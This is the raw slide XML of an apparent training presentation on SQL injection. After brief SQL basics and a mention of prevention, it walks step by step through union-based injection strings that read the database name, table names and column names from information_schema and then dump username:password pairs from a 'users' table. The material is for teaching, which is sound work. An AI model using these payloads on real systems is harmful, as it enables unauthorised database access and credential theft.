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D4A3C0-562F-4BF5-8EF1-7F9A57BE5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312B39-C1CD-429F-800E-F39CCF94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688C75-532D-4E09-8AAE-FDC8C70C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601E75-ADB7-406A-B6C5-E1AB7EAA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CCBC8D-E93C-4EBD-B74E-7B8E277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55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BA123-8CD1-435A-BA41-EB823B60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DD319E-8734-49AA-BC68-39940AA9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CE05D6-F941-4A36-A615-6FDB8CC4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F5DACB-9B16-4CA0-8BD4-16D50715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43BDB-D6FD-4387-97DD-168D05FE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71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32493A-6CFE-4D65-873D-037FF4972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508AEC-DB8F-4A0A-90A4-BAE4EE41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7B985A-7589-4735-B8D2-773DAB3C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EA6EEE-B3D9-442B-9728-3FF818CD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D80C24-2CCF-474C-A598-CD76DC86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7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4E6FB-FE01-4F04-87DE-87EDF3DD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5678D5-7ECF-4A3D-B498-00E1BC52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3E45F-9B38-4AD9-B904-5DBC85E1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9D5012-8E1A-475B-AFDE-78702B9F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1BB7CC-56B8-4288-BD02-7309417E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9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116A7-A0E2-40C3-8176-50399F9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484260-58C8-44DC-9312-88ADBFF5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DB2690-FB47-413D-A361-1CAC5EC3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01E6C4-3BEA-44F6-959B-2A18113E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125A9B-A30D-4C33-BB78-2CE3F99D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DE5F4-95DF-4B9A-B3CB-92329274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8555EA-B527-4EE9-B514-291314C1C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C91237-7EA4-454D-8D5E-CD663BE6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63BD03-D172-4516-BD1A-3D728F30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5525A2-C52F-440D-B0F6-B9ECB4C0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734EB6-FBEE-4956-80CE-536FF4B9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63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80DC2-3DD7-4604-9CB2-E37A1B0D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4A9694-1A4F-4B71-8101-5A4D416C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08E965-9D3B-433D-AF6B-F8EC13C9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A268A1-AB24-4309-92AE-4CDF23359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8124D8-0A3F-4DDC-91DC-F3C8B5555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4F89EC-2C92-43E0-8C34-742AAC55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84D55C2-ADB0-4282-8D00-3DB14242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BD78EA-4FE5-4B06-B1FE-9975B1D2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27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834367-EA8C-45DB-914C-030A66AD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A6C342-14CC-4F3A-89AB-A29E9441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30505D-AC85-4BA8-978B-F8206416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A0A5A3-2FDB-4CAB-9D39-AAA889C7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6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D476E8-A83E-4494-A05F-C90A2AFC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1E6C65-C455-4830-9B01-27648406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905D1F-DC4B-48FD-92BA-CD9D4039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22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6D3BF-D3DD-4C63-9051-1258176E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4E305-9558-4317-AA78-4AB15BBA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1E2267-886B-4B83-BC9F-B041F61E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C149DA-DCEA-4A00-9B59-7B9D4075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D4D4DE-6A1C-4667-B405-BE6543A1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526878-C67E-4937-988B-08469C2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D16E5-2382-4575-BE8A-A17D8E76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951300-7B61-43E3-8172-137705B89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A601BF-9814-4DEC-81C5-4AB06036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9A13BA-1A33-4D13-A7B3-2916D2EE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C81190-79A0-4897-AA87-E92F481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AFEFFD-8023-4C80-8D82-D763841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07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338E0D-FAE2-464C-9BB5-C0174854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19D6E3-05A9-4BA1-8252-96DD518B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D6398E-C4C1-4FA5-AC0A-BBD54D17E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65BB-6F6D-425F-96CD-EB8B0EEB5F8D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0BF9A-9026-46A8-A704-30FF13249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BD87A3-D8DD-4D6D-8538-C7B46C9C6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EC05-21D5-4C0A-B819-23924006A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7344-4869-4BAB-9951-9B229EBA5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rgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Injection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D2A5F7-FDF0-4A25-854F-A0BAD755C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8184" y="6328423"/>
            <a:ext cx="2504662" cy="41744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A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Edoardo Predieri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F64725-0438-425B-8E3C-E2AE81872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46" y="5798846"/>
            <a:ext cx="1059154" cy="105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A0079-FB16-492B-8A52-11754BB6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olidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Discover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Database Name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8047-F5D4-43FB-AD2F-03858B55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7" y="1924086"/>
            <a:ext cx="7951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' union select 1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>,3 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> union select 1,1, '1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ADD28E-BE3A-4712-9A90-0CC211267032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="34024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</a:rPr>
              <a:t>Actual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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Informations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="24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Number of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>columns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Value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:endParaRPr lang="it-I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Name of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4048DF-6F2B-48EF-A88F-37962B90ED64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="732183" y="6184474"/>
            <a:ext cx="1126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Query: SELECT from Users WHERE name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘' union select 1,table_schema,3 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> union select 1,1, '1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>’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77236CB-8A74-4FAB-BA58-AD82B2CFF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45" y="3500940"/>
            <a:ext cx="4604710" cy="14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A0079-FB16-492B-8A52-11754BB6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olidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Discover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Table Name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8047-F5D4-43FB-AD2F-03858B55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7" y="1924086"/>
            <a:ext cx="7951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' union select 1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>,3 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> ='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>edosdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>' union select 1,1, '1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ADD28E-BE3A-4712-9A90-0CC211267032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="34024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</a:rPr>
              <a:t>Actual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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Informations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="24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Number of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>columns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Value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:endParaRPr lang="it-I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Name of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Name of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4048DF-6F2B-48EF-A88F-37962B90ED64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="732183" y="6184474"/>
            <a:ext cx="1126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Query: SELECT from Users WHERE name =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘’ union select 1,table_name,1 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edosdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' union select 1,1, '1’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3BC20F-403C-460D-9B8B-1A5BFA79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7" y="3833546"/>
            <a:ext cx="3089774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8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A0079-FB16-492B-8A52-11754BB6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olidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Discover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Name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8047-F5D4-43FB-AD2F-03858B55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7" y="1924086"/>
            <a:ext cx="7951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' union select 1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>,3 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> =‘users' union select 1,1, '1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ADD28E-BE3A-4712-9A90-0CC211267032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="3402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</a:rPr>
              <a:t>Actual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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Informations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="24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Number of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>columns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Value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:endParaRPr lang="it-I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Name of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Name of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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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4048DF-6F2B-48EF-A88F-37962B90ED64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="732183" y="6184474"/>
            <a:ext cx="1126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Query: SELECT from Users WHERE name =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘' union select 1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,3 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> =‘users' union select 1,1, '1</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’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CBA9310-4898-47E9-AD7D-AFF38132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6" y="3713938"/>
            <a:ext cx="2650433" cy="10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6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A0079-FB16-492B-8A52-11754BB6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olidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Discover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Names:Passwords</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A8202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8047-F5D4-43FB-AD2F-03858B55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7" y="1924086"/>
            <a:ext cx="7951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' union all select 1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>concat(name,":",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>3 from users union all select 1,1, '1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ADD28E-BE3A-4712-9A90-0CC211267032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="34024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</a:rPr>
              <a:t>Actual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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Informations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="24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Number of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>columns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Value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:endParaRPr lang="it-I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Name of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Name of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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Names:Passws</a:t>
            </a:r>
            <a:endParaRPr lang="it-I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4048DF-6F2B-48EF-A88F-37962B90ED64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="732183" y="6184474"/>
            <a:ext cx="1126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Query: SELECT from Users WHERE name =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘' union all select 1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>concat(name,":",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3 from users union all select 1,1, '1’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513216-4800-4E39-8A14-ABB7E440C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99" y="3482253"/>
            <a:ext cx="3630912" cy="12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99DCE-6779-4452-A4BC-6ED6A5EB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A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WIN!!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30FB722-F68F-4DD6-80CA-8E496A34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423"/>
            <a:ext cx="4401164" cy="943107"/>
          </a:xfr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062C9B7-6FE2-4F30-B4A2-96E7F3B4F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76" y="3702840"/>
            <a:ext cx="2821346" cy="604574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B14D8E-92C6-4AC0-BE9D-52F2BB6D8580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239364" y="2252977"/>
            <a:ext cx="492885" cy="1449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3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99DCE-6779-4452-A4BC-6ED6A5EB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olidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t> alone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C6D629-49C4-4679-B6C5-F2223ADF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939"/>
            <a:ext cx="10515600" cy="3609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https://github.com/edoardoPredieri/SQLinjection_Training/blob/master/README.md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D29A9A-B805-45F2-A0B6-A467E6B114F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9266584" y="6308209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Thanks by Predieri Edoardo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29162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52C97-9CDE-4590-A6E5-995B531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69626" cy="1169367"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is SQL?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FE9D4-1815-4DEA-BA12-5AD724FD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87"/>
            <a:ext cx="7232374" cy="1169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SQL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>Structured</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>Lan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1"/>
              <a:t>guage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>) is a standard language for accessing and manipulating Databases.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="24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D31CEB3-EDF2-462E-8431-12ED555A5D73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745435" y="2537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4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>does</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SQL do?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1D91B56-54B8-4EC4-A0F1-D39846DF1014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3779803"/>
            <a:ext cx="7232374" cy="284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/>
              <a:t>Execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>Queries</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>Insert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>, Delete and Update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>records</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>Create new Databases, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>Tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> and Views</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>permission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>Tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>Procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> and Views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460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F97AA-E3CC-4E99-BFE7-5DA618BE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A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which commands will we see</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A8202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EF9225-0B64-4DBA-BAC1-3641D062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>
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>statements are used to fetch data from a database. Every query will begin with select.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>: i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>s a clause that indicates you want to filter the result set to include only rows where the following condition is true.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The union operator is used to combine the result-set of two or more select statements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Each select statement within union must have the same number of columns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The columns must also have similar data types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The columns in each select statement must also be in the same order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7614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E81BCF-CE3C-4E27-971C-E554C4C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A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Injection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6E8E42B-20AD-420D-818E-C75637FDF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37" y="3204137"/>
            <a:ext cx="6463463" cy="3653863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57F00FF-D55D-4487-8C66-ADF1B557B58A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="169068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/>
              <a:t>SQL injection is the most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> type of Web Attack due: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It is easy to do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unknown to most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It is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>very</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>effective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/>
              <a:t>Prevention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Input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Privileges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32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950E7-8976-42C1-A41C-28EC6484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A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Starting!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F48811-7907-461B-B18F-2736058DC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4104"/>
            <a:ext cx="4467849" cy="1009791"/>
          </a:xfr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63B4705-59A4-44CB-BFD5-48D9D239F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81" y="2126549"/>
